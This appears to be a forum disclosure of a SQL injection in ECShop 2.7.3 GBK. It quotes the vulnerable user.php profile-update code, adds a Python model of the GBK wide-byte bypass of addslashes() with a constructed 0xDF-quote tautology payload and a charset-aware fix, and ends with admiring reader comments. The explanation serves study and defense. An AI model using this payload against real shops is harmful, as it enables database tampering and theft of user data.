ECShop_V2.7.3_GBK_release1106 injection 0day
C0deplay Team j8g
Look at the code; screenshot below.
I won't explain much. Just enjoy the show, and please don't delete my account!
The code:
/* Handle editing of the personal profile (excerpt from user.php) */
elseif ($action == 'act_edit_profile')
{
    include_once(ROOT_PATH . 'includes/lib_transaction.php');

    // $user_id is set earlier in user.php from $_SESSION['user_id']
    $birthday = trim($_POST['birthdayYear']) .'-'. trim($_POST['birthdayMonth']) .'-'. trim($_POST['birthdayDay']);
    $email = trim($_POST['email']);
    $other['msn'] = $msn = isset($_POST['extend_field1']) ? trim($_POST['extend_field1']) : '';
    $other['qq'] = $qq = isset($_POST['extend_field2']) ? trim($_POST['extend_field2']) : '';
    $other['office_phone'] = $office_phone = isset($_POST['extend_field3']) ? trim($_POST['extend_field3']) : '';
    $other['home_phone'] = $home_phone = isset($_POST['extend_field4']) ? trim($_POST['extend_field4']) : '';
    $other['mobile_phone'] = $mobile_phone = isset($_POST['extend_field5']) ? trim($_POST['extend_field5']) : '';
    // sel_question is taken from $_POST as-is: no trim(), no escaping of its own
    $sel_question = empty($_POST['sel_question']) ? '' : $_POST['sel_question'];
    $passwd_answer = isset($_POST['passwd_answer']) ? trim($_POST['passwd_answer']) : '';

    /* Update the user's extended-field data */
    $sql = 'SELECT id FROM ' . $ecs->table('reg_fields') . ' WHERE type = 0 AND display = 1 ORDER BY dis_order, id'; // read the ids of all extended fields
    $fields_arr = $db->getAll($sql);
    foreach ($fields_arr AS $val) // update each extended field in turn
    {
        $extend_field_index = 'extend_field' . $val['id'];
        if (isset($_POST[$extend_field_index]))
        {
            // extended-field content is HTML-escaped and capped at 99 characters
            $temp_field_content = strlen($_POST[$extend_field_index]) > 100 ? mb_substr(htmlspecialchars($_POST[$extend_field_index]), 0, 99) : htmlspecialchars($_POST[$extend_field_index]);
            $sql = 'SELECT * FROM ' . $ecs->table('reg_extend_info') . " WHERE reg_field_id = '$val[id]' AND user_id = '$user_id'";
            if ($db->getOne($sql)) // a record already exists: update it
            {
                $sql = 'UPDATE ' . $ecs->table('reg_extend_info') . " SET content = '$temp_field_content' WHERE reg_field_id = '$val[id]' AND user_id = '$user_id'";
            }
            else // no record yet: insert one
            {
                $sql = 'INSERT INTO '. $ecs->table('reg_extend_info') . " (`user_id`, `reg_field_id`, `content`) VALUES ('$user_id', '$val[id]', '$temp_field_content')";
            }
            $db->query($sql);
        }
    }

    /* Write the password hint question and answer */
    if (!empty($passwd_answer) && !empty($sel_question))
    {
        // both values are interpolated straight into the query string
        $sql = 'UPDATE ' . $ecs->table('users') . " SET `passwd_question`='$sel_question', `passwd_answer`='$passwd_answer' WHERE `user_id`='" . $_SESSION['user_id'] . "'";
        echo $sql; // echoes the built query, so it shows up in the response
        $db->query($sql);
    }
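An added example, written for this page and not ECShop's code nor the poster's: a Python model of the final UPDATE in the snippet that shows why the wide byte the commenters mention gets past addslashes() on a GBK connection, beside a charset-aware escape that rejects it. It assumes ECShop's addslashes_deep() on $_POST, a GBK connection charset, the default ecs_ table prefix and a made-up user_id; the payload and the "fluffy" answer are constructed. The SQL-literal scanner is a deliberately naive stand-in for the MySQL parser (no comment handling).

```python
# Added example (not ECShop's code, not from the original post): models the
# act_edit_profile UPDATE and the GBK wide-byte bypass of addslashes().
from typing import Optional

# Assumed: ECShop's default "ecs_" table prefix. user_id 7 below is made up.
TABLE_USERS = b"`ecs_users`"


def addslashes(raw: bytes) -> bytes:
    """PHP addslashes() over raw bytes: a backslash before single quote,
    double quote, backslash and NUL. Byte-oriented; knows nothing about GBK."""
    out = bytearray()
    for ch in raw:
        if ch in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(ch)
    return bytes(out)


def escape_gbk(raw: bytes) -> Optional[bytes]:
    """Charset-aware escaping, the behaviour of mysql_real_escape_string() when the
    connection charset really is GBK: decode strictly (a lone lead byte such as
    0xDF followed by a quote is rejected), escape whole characters, re-encode.
    Returns None for bytes that are not valid GBK."""
    try:
        text = raw.decode("gbk")
    except UnicodeDecodeError:
        return None
    text = (text.replace("\\", "\\\\").replace("'", "\\'")
                .replace('"', '\\"').replace("\x00", "\\0"))
    return text.encode("gbk")


def build_update(sel_question: bytes, passwd_answer: bytes, user_id: int) -> bytes:
    """Same string concatenation as user.php, as the byte stream sent to MySQL."""
    return (b"UPDATE " + TABLE_USERS + b" SET `passwd_question`='" + sel_question
            + b"', `passwd_answer`='" + passwd_answer
            + b"' WHERE `user_id`='" + str(user_id).encode() + b"'")


def vulnerable_update(sel_question: bytes, passwd_answer: bytes, user_id: int) -> str:
    """ECShop's path: addslashes_deep() on $_POST, then concatenation. The bytes
    are decoded as GBK, which is how the server reads them on a GBK connection."""
    sql = build_update(addslashes(sel_question), addslashes(passwd_answer), user_id)
    return sql.decode("gbk")


def hardened_update(sel_question: bytes, passwd_answer: bytes, user_id: int) -> Optional[str]:
    """Same query with charset-aware escaping; None means the input was rejected.
    (A prepared statement would be better still; this keeps the page's structure.)"""
    q, a = escape_gbk(sel_question), escape_gbk(passwd_answer)
    if q is None or a is None:
        return None
    return build_update(q, a, user_id).decode("gbk")


def outside_literals(sql: str) -> str:
    """Text the SQL parser sees as code: everything outside single-quoted string
    literals, honouring backslash escapes inside them. Comments are not modelled."""
    out, in_literal, i = [], False, 0
    while i < len(sql):
        c = sql[i]
        if in_literal:
            if c == "\\":
                i += 2          # skip the escaped character
                continue
            if c == "'":
                in_literal = False
        elif c == "'":
            in_literal = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


def injected(sql: str) -> bool:
    """True when the tautology from the constructed payload escaped the literal."""
    return "OR 1=1" in outside_literals(sql)


# Constructed payload: 0xDF is a GBK lead byte. addslashes() turns 0xDF 0x27 into
# 0xDF 0x5C 0x27; a GBK server reads 0xDF 0x5C as one two-byte character and
# 0x27 as a bare quote that closes the literal.
PAYLOAD = b"\xdf' OR 1=1#"

if __name__ == "__main__":
    print(vulnerable_update(PAYLOAD, b"fluffy", 7))
    print("vulnerable:", injected(vulnerable_update(PAYLOAD, b"fluffy", 7)))   # True
    print("hardened:", hardened_update(PAYLOAD, b"fluffy", 7))                  # None
```

The key observation is in the vulnerable output: the backslash that addslashes() inserted is gone, swallowed as the trail byte of a two-byte GBK character, and the quote stands alone. A UTF-8 build does not have this property (0x5C is never a trail byte there), which is why the thread asks whether the UTF8 release is affected; the unescaped interpolation of sel_question is the same in both, so the question is only whether an unescaped quote can be produced.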
67 comments
Been away for a while, and the first thing I find on coming back is a gem like this. +1 to OP
Nice hole, bookmarked
mark. No threads of my own, only 10 posts -_-
So ecshop makes this kind of mistake too, heh
14 $sel_question = empty($_POST['sel_question']) ? '' : $_POST['sel_question']; Looks like everything starts here. The other parameters get strict checks, so why does this one only test for empty? Laziness?
Bookmarked without hesitation... OP is a big hacker...
One wide byte, and how many sites get exposed...
A 0day~~
I can't read PHP~~~
Seems like a lot of PHP programs have their problems in GBK encoding
Support~!
What a big 0day~
Wide characters~~
Been away for a while, and the first thing I find on coming back is a gem like this. +1 to OP.
Tried it
Haven't seen an ECSHOP hole in a long time, bookmarked.
Does it apply to the UTF8 version? Bookmarked anyway
Every time before an ID cleanup, a 0day gets published
Eh, I finally remembered my password
Bookmarked, thanks OP